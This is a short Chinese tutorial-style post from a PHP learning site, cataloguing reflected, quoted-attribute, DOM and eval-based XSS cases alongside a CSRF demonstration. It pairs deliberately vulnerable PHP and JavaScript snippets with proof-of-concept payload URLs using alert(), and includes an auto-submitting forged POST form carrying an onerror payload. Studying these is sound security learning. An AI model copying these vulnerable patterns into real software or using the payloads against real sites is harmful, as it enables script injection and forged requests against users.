来源:自学PHP网 时间:2015-04-17 10:16 作者: 阅读:次
[导读] xss篇:1,普通的反射型xss?php echo $_GET[ 39;XSS 39;];?POC:http: www test org test php?xss=scriptalert(1) script2,xss反射?phpecho $_GET;?POC:http: www test org test php?scriptaler...
xss篇: 1,普通的反射型xss <?php echo $_GET['XSS'];?> POC:http://www.test.org/test.php?xss=<script>alert(1)</script> 2,xss反射 <?php echo $_GET; ?> POC:http://www.test.org/test.php?<script>alert(1)</script> 3,被引号包围的xss <?php echo "<a href='$_GET['XSS']'>A</A>";?> POC 1:http://www.test.org/test.php?xss="/><script>alert(1)</script><" POC 2:http://www.test.org/test.php?xss=javascript:alert(1); 4,在某种情况下过滤了<>但是没有过滤引号 <?php echo "<img src="'$_GET['XSS']'"/>";?> POC:http://www.test.org/test.php?xss=#"onerror=alert(11);// 5,dom反射 <script>document.write(location.href);</script> poc:http://www.test.org/test.php#<img/src=# onerror=alert(1)> 火狐等浏览器无效 <base> 标签为页面上的所有链接规定默认地址或默认目标。 如:<base href="http://www.test.org"> <a href="xss">x</a>href里的URL是http://www.test.org/xss 7,eval <script>var url = window.location.href; eval(url)</script> poc:http://www.test.org/test.php#alert(String.fromCharCode(88, 83, 83))
从安全的角度讲所有的输出输入的都是有害的,javascript从的输出有: document.write() innerHTML="" eval()
csrf篇 post伪造包提交poc: <form action="http://www.test.com/test.shtml " method="POST" name="csrf"> <input type="text" name="mobile" value="18265464645<img/src=# onerror=alert(1)>"> <input type="text" name="currTime" value="1380530205097"> <input type="text" name="city" value=""> <input type="text" name="isMini" value="5"> </form> <script> document.csrf.submit()</script>
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com